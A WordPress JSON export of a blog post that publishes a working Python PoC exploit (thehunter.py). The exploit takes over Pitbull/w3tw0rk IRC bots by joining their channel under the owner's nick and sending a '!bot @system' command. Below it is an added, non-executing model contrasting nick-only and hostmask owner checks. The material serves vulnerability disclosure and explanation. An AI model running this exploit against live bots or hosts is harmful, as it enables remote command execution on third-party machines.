{"id":2598,"date":"2015-09-23T14:29:22","date_gmt":"2015-09-23T14:29:22","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2598"},"modified":"2015-09-23T14:29:22","modified_gmt":"2015-09-23T14:29:22","slug":"w3tw0rk-pitbull-perl-irc-bot-remote-code-execution-poc-exploit-by-shipcode","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2598","title":{"rendered":"w3tw0rk \/ Pitbull Perl IRC Bot Remote Code Execution PoC Exploit by Shipcode"},"content":{"rendered":"<p>The Pitbull and w3tw0rk Perl IRC bots do not properly validate who is issuing commands in channel PRIVMSGs: the bot identifies its owner by IRC nickname alone, so a remote attacker who joins the bot's channel using the owner's nick is treated as the owner. This lets the attacker run arbitrary commands on the host. The owner-only command !bot @system 'command' runs its argument as a command on the machine running the bot, and that is what the PoC below uses: it takes the owner's nick as its only argument, joins the bot's channel under that nick, sends !bot @system 'uname -a', and reports success when the bot replies with a Linux kernel banner.<\/p>\n<pre class=\"\"># thehunter.py\n# Exploit Title: Pitbull \/ w3tw0rk Perl IRC Bot Remote Code Execution\n# Author: Jay Turla ( @shipcod3 )\n# Description: pitbull-w3tw0rk_hunter is a POC exploit for the Pitbull or w3tw0rk IRC Bot. It takes over the owner of the bot (by using the owner's nick), which then allows Remote Code Execution.\nimport socket\nimport sys\n\n\ndef usage():\n    print(\"USAGE: python thehunter.py nick\\n\")\n\n\ndef send(irc, line):\n    # IRC lines are CRLF-terminated and the socket takes bytes, not str\n    irc.send((line + \"\\r\\n\").encode())\n\n\ndef main(argv):\n    if len(argv) &lt; 2:\n        return usage()\n    # irc server connection settings\n    botnick = argv[1]  # the owner's nick: using it is the admin \"payload\" that takes over the w3tw0rk bot\n    server = \"us.dal.net\"  # irc server\n    channel = \"#buhaypirata\"  # channel where the bot is located\n    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # defines the socket\n    print(\"connecting to: \" + server)\n    irc.connect((server, 6667))  # connects to the server\n    send(irc, \"USER \" + botnick + \" \" + botnick + \" \" + botnick + \" :I eat w3tw0rk bots!\")  # user registration\n    send(irc, \"NICK \" + botnick)  # sets nick (the bot owner's nick)\n    send(irc, \"JOIN \" + channel)  # join the chan\n    send(irc, \"PRIVMSG \" + channel + \" :!bot @system 'uname -a' \")  # send the payload to the bot\n    while True:  # puts it in a loop\n        text = irc.recv(2040).decode(\"utf-8\", \"ignore\")  # receive the text\n        if not text:  # server closed the connection\n            break\n        print(text)  # print text to console\n        if text.find('PING') != -1:  # check if 'PING' is found\n            send(irc, 'PONG ' + text.split()[1])  # returns 'PONG' to the server (prevents pinging out!)\n        if text.find('!quit') != -1:  # quit the Bot\n            send(irc, \"QUIT\")\n            sys.exit()\n        if text.find('Linux') != -1:  # the bot echoed its uname output, so the command ran\n            send(irc, \"PRIVMSG \" + channel + \" :The bot answers to \" + botnick + \" which allows command execution \")\n            send(irc, \"QUIT\")\n            sys.exit()\n\n\nif __name__ == \"__main__\":\n    main(sys.argv)\n<\/pre>\n<h1>References<\/h1>\n<ul>\n<li><a href=\"http:\/\/www.osvdb.org\/120384\" rel=\"nofollow\">OSVDB-120384<\/a><\/li>\n<li><a href=\"http:\/\/www.exploit-db.com\/exploits\/36652\/\" rel=\"nofollow\">EDB-36652<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>The Pitbull and w3tw0rk Perl IRC bots do not properly validate who is issuing commands in channel PRIVMSGs: the bot identifies its owner by IRC nickname alone, so a remote attacker who joins the bot's channel using the owner's nick is treated as the owner. This lets the attacker run arbitrary commands on the host.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[570,431],"tags":[571,572,573,574],"class_list":["post-2598","post","type-post","status-publish","format-standard","hentry","category-botnet","category-vulnerability-analysis","tag-cmd","tag-irc-bot","tag-jay-turla","tag-w3tw0rk"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2598","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2598"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2598\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2598"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2598"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
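The post describes the bug only at the level of "the bot trusts whoever has the owner's nick". The Python below is an added example, not code from the post and not the Pitbull/w3tw0rk source (which is not reproduced on the page): it models the owner check the thehunter.py PoC abuses by parsing raw channel PRIVMSG lines, pulling the command out of an "!bot @system '...'" message, and running that command through two policies side by side. The nick-only policy is a reconstruction of the behaviour the PoC relies on; the hostmask policy is the stricter alternative. The sample lines, the owner nick "pitbullowner", the hostmask "pitbullowner!~owner@home.example" and all function names are constructed for the example. No command is ever executed: the model returns the command that would have run.

```python
"""Model of the owner check that the thehunter.py PoC abuses.

Added example, not code from the post or from the Pitbull/w3tw0rk bots.
The nick-only check is a reconstruction of the behaviour the PoC relies
on (any sender whose nick matches the configured owner is the owner);
the hostmask check is the stricter alternative. Commands are extracted
and returned, never run.
"""
import re
import shlex

# Constructed sample traffic: the real owner, an impostor who has taken
# the owner's nick from another user@host (what thehunter.py does), a
# random user, and ordinary chatter from the owner.
OWNER_NICK = "pitbullowner"                           # hypothetical owner nick
OWNER_HOSTMASK = "pitbullowner!~owner@home.example"   # hypothetical full mask

SAMPLE_LINES = [
    ":pitbullowner!~owner@home.example PRIVMSG #buhaypirata :!bot @system 'uptime'",
    ":pitbullowner!~hunter@attacker.example PRIVMSG #buhaypirata :!bot @system 'uname -a' ",
    ":someuser!~u@other.example PRIVMSG #buhaypirata :!bot @system 'id'",
    ":pitbullowner!~owner@home.example PRIVMSG #buhaypirata :hello everyone",
]

# :nick!user@host PRIVMSG target :text
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+)"
    r"\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)


def parse_privmsg(line):
    """Split a raw PRIVMSG from a user into its sender parts and text.

    Returns None for anything else (server PINGs, numerics, ...), so the
    caller can skip it.
    """
    m = PRIVMSG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    d = m.groupdict()
    d["hostmask"] = "%s!%s@%s" % (d["nick"], d["user"], d["host"])
    return d


def extract_system_command(text):
    """Return the command inside "!bot @system '<cmd>'", else None.

    shlex handles the single-quoted argument the PoC sends; an unbalanced
    quote or any non-@system message yields None.
    """
    try:
        parts = shlex.split(text.strip())
    except ValueError:
        return None
    if len(parts) >= 3 and parts[0] == "!bot" and parts[1] == "@system":
        return " ".join(parts[2:])
    return None


def nick_only_authorized(msg, owner_nick=OWNER_NICK):
    """The weak check the PoC abuses: the nick alone decides (assumed bot logic)."""
    return msg["nick"] == owner_nick


def hostmask_authorized(msg, owner_hostmask=OWNER_HOSTMASK):
    """Stricter check: the whole nick!user@host must match the owner."""
    return msg["hostmask"] == owner_hostmask


def dispatch(line, authorize):
    """Return (sender hostmask, command that WOULD run), or None if nothing runs."""
    msg = parse_privmsg(line)
    if msg is None:
        return None
    cmd = extract_system_command(msg["text"])
    if cmd is None or not authorize(msg):
        return None
    return (msg["hostmask"], cmd)


def run_model(lines, authorize):
    """Per sample line, what the bot would execute under the given policy."""
    return [dispatch(line, authorize) for line in lines]


if __name__ == "__main__":
    for name, policy in (("nick only", nick_only_authorized),
                         ("hostmask", hostmask_authorized)):
        print("policy:", name)
        for line, result in zip(SAMPLE_LINES, run_model(SAMPLE_LINES, policy)):
            print("  %-78s -> %s" % (line.strip(), result))
```

Under the nick-only policy the impostor's "uname -a" from attacker.example is accepted exactly like the real owner's "uptime", which is the takeover the PoC performs; under the hostmask policy only the line from the owner's own user@host survives. A hostmask check is still only as strong as the server's host assignment, so a real fix would also require an out-of-band credential for owner commands and would not hand arbitrary strings to a command runner at all; the model stops at showing why the nick is not an identity.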